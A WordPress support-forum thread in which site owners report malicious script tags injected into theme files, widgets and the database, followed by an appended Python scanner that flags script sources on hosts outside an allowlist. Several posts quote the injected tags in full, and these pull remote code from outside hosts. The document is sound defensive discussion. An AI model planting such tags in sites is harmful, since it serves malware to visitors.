Malware links script from www.argoauto.net
-
This morning my site had this as the first line of code
<script type="text/javascript" src="http://argoauto.net/tmp/index-bkp.php"></script>
and Google chrome is throwing malware warnings.
Can’t find it in the header or functions files… Anyone else encountered this bug?
Thanks
Cooper
-
This showed up on one of my sites today as well. I found the code in a footer widget. No idea how it got there.
Thank you, I will look there!
Out of curiosity what version of WordPress is your install running? This client is on 3.3.1 and I’m wondering if this is still a vulnerability in the latest version.
Can you elaborate just a little bit on which file you found the script link in? I’m having trouble locating it.
Thanks
Cooper
I got a Google warning because of malicious scripts on my website and indeed in the header.php of the theme file I saw this code:
<script type="text/javascript" src=[ redacted, you don't need to post that here ]"></script>
I am using an Artisteer generated template with the newest version of WordPress 3.4.2 and these plugins:
All in One SEO Pack 1.6.15.2
Google XML Sitemaps 3.2.8
Hyper Cache 2.9.0.3
Jigowatt WordPress Ajax Contact Forms 1.2.3
MailChimp Widget 0.8.12
Newsletters Tribulant 3.9.4
Print Friendly and PDF 3.1.3
Social Media Widget 2.9.4
WP Simple Survey 2.2.9
WP to Twitter 2.4.13
Any similarities?
Same here, it's in the Adspace Widget! For some reason in the ‘adspace below article’ option there is a link/script to argoauto.net.
Make sure you change your password, someone or a script cracked your password.
I just found that line today at the top of my theme’s (Suffusion) index.php. It’s the 2nd time such a script has popped up there in the past 2 months. I’d love to figure out how it’s getting there.
@jzn21, I don’t think we have any plugins or even WordPress version in common.
Same in my wp. Newest wp – version 3.4.2
In my theme index.php there were these lines with js at the top.
Any solution for the future?
Is this some wp bug?
Seems like a hosting issue to me. I’ve contacted GoDaddy about it (via a trouble ticket, since their help line gives only a busy signal, a highly unusual sign that something’s going on).
Argoauto.net should be blacklisted by their servers, I think.
Notify your host ASAP.
Follow all this information.
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/
http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
For checking site.
http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
This shows up in my Malware search in Developer tools and a few other sites. I am unable to find ‘argoauto.net’ in any searches of my files or my database. Where could this be hiding? If it is gone from my files, does anyone know how it got there? Any solutions to block this?
Have a similar script that gets added, in the ‘Adspace below Article’ <script type="text/javascript" src="http://61.19.251.27/web/cb.php"></script>
This has been happening for about 4 weeks, at the beginning it was the argoauto.net script.
I have the latest WordPress and those plugins in common with jzn21
All in One SEO Pack 1.6.15.2
Google XML Sitemaps
MailChimp Widget 0.8.12
WP to Twitter 2.4.13
This is consistent with my infection. Removed the argoauto.net script when it popped up a couple weeks ago, today the
<script type="text/javascript" src="redacted"></script>
popped up. Both times it was the first line of index.php in the theme file.
Same exact thing happened to me…. First argoauto.net and now:
<script type="text/javascript" src="http://61.19.251.27/web/cb.php"></script>
This is the third time the site was blocked for malware.
I did not find this in any of my files but in my database. I removed it from there and now my site is back up but has anyone found where this vulnerability might be? I have many plugins on the site and I am not sure where to begin to look.
This site is enormous and I am afraid to do a complete reinstall… Any help would be greatly appreciated.
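The posts above report the injected tag as the first line of a theme's index.php or header.php, and inside a widget setting stored in the database. As an added example (not part of any post in this thread), this Python sketch lists `<script>` sources whose host is not on an allowlist, over theme files and over exported option rows; the function names, the allowlist and the sample hosts are assumptions constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# src value of a <script> tag; tolerates curly quotes and the backslash-escaped
# quotes found in SQL dumps of wp_options.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*\\?[\"'\u201c\u201d]?([^\"'\u201c\u201d\\\s>]+)",
    re.IGNORECASE,
)

def find_foreign_scripts(text, allowed_hosts):
    """Return [(line_no, host, url)] for script sources on hosts not allowlisted."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for url in SCRIPT_SRC.findall(line):
            # Protocol-relative URLs need a scheme before urlparse sees a host.
            parsed = urlparse("http:" + url if url.startswith("//") else url)
            host = (parsed.hostname or "").lower()
            if host and host not in allowed_hosts:  # relative paths have no host
                hits.append((line_no, host, url))
    return hits

def scan_theme(root, allowed_hosts):
    """Scan every .php file under root; return {relative_path: hits}."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = find_foreign_scripts(path.read_text(errors="replace"), allowed_hosts)
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

def scan_options(rows, allowed_hosts):
    """rows: (option_name, option_value) pairs exported from the database."""
    return {name: hits for name, value in rows
            if (hits := find_foreign_scripts(value, allowed_hosts))}

# Constructed samples (hosts are placeholders, not values from the thread).
ALLOWED = {"www.mysite.example"}
SAMPLE_INDEX = (
    '<script type="text/javascript" src="http://injected.example/tmp/x.php"></script>\n'
    "<?php get_header(); ?>\n"
    '<script src="/wp-includes/js/jquery/jquery.js"></script>\n'
)
SAMPLE_ROWS = [("widget_text", r'a:1:{s:4:"text";s:62:"<script src=\"http://198.51.100.7/web/x.php\"></script>";}')]

if __name__ == "__main__":
    print(find_foreign_scripts(SAMPLE_INDEX, ALLOWED))
    print(scan_options(SAMPLE_ROWS, ALLOWED))
```

A hit on line 1 of a theme file matches the pattern several posters describe; a hit in an option row points at a widget setting rather than a file on disk.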
- The topic ‘Malware links script from www.argoauto.net’ is closed to new replies.